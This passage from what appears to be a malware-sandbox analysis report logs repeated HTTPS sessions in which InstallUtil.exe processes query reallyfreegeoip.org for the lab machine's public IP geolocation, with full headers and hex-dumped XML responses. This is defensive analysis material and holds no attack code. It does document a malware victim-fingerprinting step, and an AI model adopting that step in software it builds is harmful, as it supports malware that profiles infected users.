                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BG9gc7BeM72Zfbuq8MPFIdBUr%2BKSWx1YrCnfEueHZfQGubXBBgAysLhbAR5HKkYaZ7wo70khSiv8UPwgl9%2FY%2BHxutSwdkuEtZXQkH45YCLXy3W8FTmKYqpg%2B1HAQMp48OoTkQ11H"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfad05c8943ab-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:41 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.649751188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:42 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:42 UTC704INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:42 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40946
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYtNetDKKo6Q9%2BE%2BDe4P8GsZZOJka6S2bivFrNVUmls0F5SfbxjkDGENKuNK7RgJ5HnXgC8f4skHUJXTw6RzwmjR9D8EhDq8LpcdHP4NiNS5AW5oVcusoZzjXr3ueyVV8arKIObM"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfad7ffa41a1b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:42 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.649753188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:43 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:44 UTC712INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:43 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40947
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2BH8WR%2F5TaayG5aoUQHeWl%2BW%2Bs0TU49DTBD7vc8fahbSkSjiw7YfDdzymOFvQGgM4il8IXO7Wg%2BxtVdLtt9iR6ML%2FxOJPpqcOw9yFUeFRCPC7AtS7HjucgIN9oycW5gX4BsWlFv9"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfadfba37330c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:44 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.649755188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:45 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:46 UTC693INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:46 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: MISS
                          Last-Modified: Tue, 27 Aug 2024 18:03:46 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IOvaIUalndN5DGGNQo0UJ5a1rgX379gZDTXSHwuS1WTB2S%2BmkU0jZdl%2B6kMvNpxG1oOAx2FxwEIHASLck65INc7EicTzl4bFrkEL11N64EQ3xKJjYFqtgVm7qukiWyd0RKxAmBg"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfaec695f822d-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:46 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:46 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.649758188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:47 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:47 UTC708INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:47 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40951
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBKAbumFiymj85vnbWsjVRqwkUG79n5%2BevRzt8%2BzgjqzdJjLKHc4S9xX27k5raAeFC0P00UYWfEieWSJJWk52VU0z7hjLaxmbifyUglCs0NtFl36md%2BJzHObKSRHuMASwL%2BeCNL8"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfaf598679e17-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:47 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.649759188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:48 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:48 UTC704INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:48 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40952
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e8LkuvZrkIuFLeGJ1dXv62hP5Ic22yuK1eDNWScoPQ8HepCuhU6aAjkXKk8KAxR8FyKQ7r0MfQzvoeiEircfPDo%2B0DidcPs9aZVF7mulBrezs1aKe%2BCrU5i56ccFRXwpYmR5M25V"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfafcee1f19e7-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:48 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.649760188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:48 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:48 UTC714INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:48 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40952
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wr0g%2F7aAHAzbbV%2BRMfsl5v5mX1IgW%2B8cVEjn%2BkX1%2BDKe3mK1L1RlDm0r9fsqK8z4rGvWSOW3yfIwAdjmTaIQWUlz%2FEkPv6SVoexPiot1OXXI0%2BAoaT6qi8YcEfMFgPKzYrGYyVTc"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfafd6cc3434a-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:48 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.649763188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:50 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:50 UTC702INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:50 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40954
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmjknL6ZUqfMljjd6Cgns8aODANo95tkXmeiDwkYJHeMII35LX64N9zT0ttJJVogTwTLnEZCyK3hLUeg%2Brwd4EhiQuckVHnNcRk5x07zuCOv0Mu0AUjF388LoySzflQaqv9jrrY3"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb07d9059e17-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:50 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.649764188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:50 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:50 UTC714INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:50 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40954
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YssmRAr6U3hRER3e7d%2FjS2qspk2psnIFoFOpYjC6gPxHV4coUkEIhHJmfWV2WoLmf7gvl81etvR9zhiRg2ym%2BiE3Glwy8FM%2BuvRVLcTbuwTrBHi5vsO%2FgQ%2BOjpNZOe1TmW5%2BE8%2Fv"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb085dc2434b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:50 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.649766188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:51 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:51 UTC702INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:51 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40955
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asPWVoshW40tUEHH5RCVIf4t0SUJPO757DID972GeYwIIPNYrXYoHtxy1PRTkXH9POoAL0xvJKxNOu0Xb%2B8tZ97dfaUUortdFNKFUWis810GCcAxYP0DEHP6sA87YzMsFBLIeaRk"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfb0fe92d0ca1-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:51 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:51 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.649768188.114.97.34431596C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:53 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:53 UTC708INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:53 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40957
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
